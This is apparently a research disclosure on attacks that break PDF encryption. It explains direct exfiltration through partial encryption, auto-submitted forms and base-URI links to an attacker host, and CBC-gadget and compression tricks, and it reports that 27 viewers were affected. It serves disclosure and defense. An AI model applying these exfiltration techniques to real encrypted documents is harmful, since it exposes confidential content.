In the given example, the attacker abuses the flexibility of the PDF encryption standard to define certain objects as unencrypted. The attacker modifies the Encrypt dictionary (6 0 obj) in a way that the document is partially encrypted – all streams are left AES256 encrypted while strings are defined as unencrypted by setting the Identity filter. Thus, the attacker can freely modify strings in the document and add additional objects containing unencrypted strings.
This attack has three requirements to be successful. While all requirements are PDF standard compliant, they have not necessarily been implemented by every PDF application:
Please note that the attack does not abuse any cryptographic issues, so that there are no requirements to the underlying encryption algorithm (e.g., AES) or the encryption mode (e.g., CBC).
In the following, we show three techniques how an attack can exfiltrate the content.
The PDF standard allows a document’s encrypted streams or strings to be defined as values of a PDF form to be submitted to an external server. This can be done by referencing their object numbers as the values of the form fields within the Catalog object, as shown in the example on the left side. The value of the PDF form points to the encrypted data stored in 2 0 obj.
To make the form auto-submit itself once the document is opened and decrypted, an OpenAction can be applied. Note that the object which contains the URL (http://p.df) for form submission is not encrypted and completely controlled by the attacker. As a result, as soon as the victim opens the PDF file and decrypts it, the OpenAction will be executed by sending the decrypted content of 2 0 obj to (http://p.df).
If forms are not supported by the PDF viewer, there is a second method to achieve direct exfiltration of a plaintext. The PDF standard allows setting a “base” URI in the Catalog object used to resolve all relative URIs in the document.
This enables an attacker to define the encrypted part as a relative URI to be leaked to the attacker’s web server. Therefore the base URI will be prepended to each URI called within the PDF file. In the given example, we set the base URI to (http://p.df).
The plaintext can be leaked by clicking on a visible element such as a link, or without user interaction by defining a URI Action to be automatically performed once the document is opened.
In the given example, we define the base URI within an Object Stream, which allows objects of arbitrary type to be embedded within a stream. This construct is a standard compliant method to put unencrypted and encrypted strings within the same document. Note that for this attack variant, only strings can be exfiltrated due to the specification, but not streams; (relative) URIs must be of type string. However, fortunately (from an attacker’s point of view), all encrypted streams in a PDF document can be re-written and defined as hex-encoded strings using the
Nevertheless, the attack has some notable drawbacks compared to Exfiltration via PDF Forms:
Not all PDF viewers support partially encrypted documents, which makes them immune to direct exfiltration attacks. However, because PDF encryption generally defines no authenticated encryption, attackers may use CBC gadgets to exfiltrate plaintext. The basic idea is to modify the plaintext data directly within an encrypted object, for example, by prefixing it with an URL. The CBC gadget attack, thus does not necessarily require cross-object references.
Note that all gadget-based attacks modify existing encrypted content or create new content from CBC gadgets. This is possible due to the malleability property of the CBC encryption mode.
This attack has two necessary preconditions:
These requirements differ from those of the direct exfiltration attacks, because the attacks are applied "through" the encryption layer and not outside of it.
As described above, PDF allows the submission of string and stream objects to a web server. This can be used in conjunction with CBC gadgets to leak the plaintext to an attacker-controlled server, even if partial encryption is not allowed.
A CBC gadget constructed from the known plaintext can be used as the submission URL, as shown in the example on the left side. The construction of this particular URL gadget is challenging. As PDF encryption uses PKCS#5 padding, constructing the URL using a single gadget from the known Perms plaintext is difficult, as the last 4 bytes that would need to contain the padding are unknown.
However, we identified two techniques to solve this. On the one hand, we can take the last block of an unknown ciphertext and append it to our constructed URL, essentially reusing the correct PKCS#5 padding of the unknown plaintext. Unfortunately, this would introduce 20 bytes of random data from the gadgeting process and up to 15 bytes of the unknown plaintext to the end of our URL.
On the other hand, the PDF standard allows the execution of multiple OpenActions in a document, allowing us to essentially guess the last padding byte of the Perms value. This is possible by iterating over all 256 possible values of the last plaintext byte to get 0x01, resulting in a URL with as little random as possible (3 bytes). As a limitation, if one of the 3 random bytes contains special characters, the form submission URL might break.
Using CBC gadgets, encrypted plaintext can be prefixed with one or more chosen plaintext blocks. An attacker can construct URLs in the encrypted PDF document that contain the plaintext to exfiltrate. This attack is similar to the exfiltration hyperlink attack (A2). However, it does not require the setting of a “base” URI in plaintext to achieve exfiltration.
The same limitations described for direct exfiltration based on links (A2) apply. Additionally, the constructed URL contains random bytes from the gadgeting process, which may prevent the exfiltration in some cases.
While CBC gadgets are generally restricted to the block size of the underlying block cipher – and more specifically the length of the known plaintext, in this case, 12 bytes – longer chosen plaintexts can be constructed using compression. Deflate compression, which is available as a filter for PDF streams, allows writing both uncompressed and compressed segments into the same stream. The compressed segments can reference back to the uncompressed segments and achieve the repetition of byte strings from these segments. These backreferences allow us to construct longer continuous plaintext blocks than CBC gadgets would typically allow for. Naturally, the first uncompressed occurrence of a byte string still appears in the decompressed result. Additionally, if the compressed stream is constructed using gadgets, each gadget generates 20 random bytes that appear in the decompressed stream. A non-trivial obstacle is to keep the PDF viewer from interpreting these fragments in the decompressed stream. While hiding the fragments in comments is possible, PDF comments are single-line and are thus susceptible to newline characters in the random bytes. Therefore, in reality, the length of constructed compressed plaintexts is limited.
To deal with this caveat, an attacker can use ObjectStreams which allow the storage of arbitrary objects inside a stream. The attacker uses an object stream to define new objects using CBC gadgets. An object stream always starts with a header of space-separated integers which define the object number and the byte offset of the object inside the stream. The dictionary of an object stream contains the key First which defines the byte offset of the first object inside the stream. An attacker can use this value to create a comment of arbitrary size by setting it to the first byte after their comment.
Using compression has the additional advantage that compressed, encrypted plaintexts from the original document can be embedded into the modified object. As PDF applications often create compressed streams, these can be incorporated into the attacker-created compressed object and will therefore be decompressed by the PDF applications. This is a significant advantage over leaking the compressed plaintexts without decompression as the compressed bytes are often not URL-encoded correctly (or at all) by the PDF applications, leading to incomplete or incomprehensible plaintexts. However, due to the inner workings of the deflate algorithms, a complete compressed plaintext can only be prefixed with new segments, but not postfixed. Therefore, a string created using this technique cannot be terminated using a closing bracket, leading to a half-open string. This is not a standard compliant construction, and PDF viewers should not accept it. However, a majority of PDF viewers accept it anyway.
During our security analysis, we identified two standard compliant attack classes which break the confidentiality of encrypted PDF files. Our evaluation shows that among 27 widely-used PDF viewers, all of them are vulnerable to at least one of those attacks, including popular software such as Adobe Acrobat, Foxit Reader, Evince, Okular, Chrome, and Firefox.
You can find the detailed results of our evaluation here.
First, many data formats allow to encrypt only parts of the content (e.g., XML, S/MIME, PDF). This encryption flexibility is difficult to handle and allows an attacker to include their own content, which can lead to exfiltration channels.
Second, when it comes to encryption, AES-CBC – or encryption without integrity protection in general – is still widely supported. Even the latest PDF 2.0 specification released in 2017 still relies on it. This must be fixed in future PDF specifications and any other format encryption standard, without enabling backward compatibility that would re-enable CBC gadgets.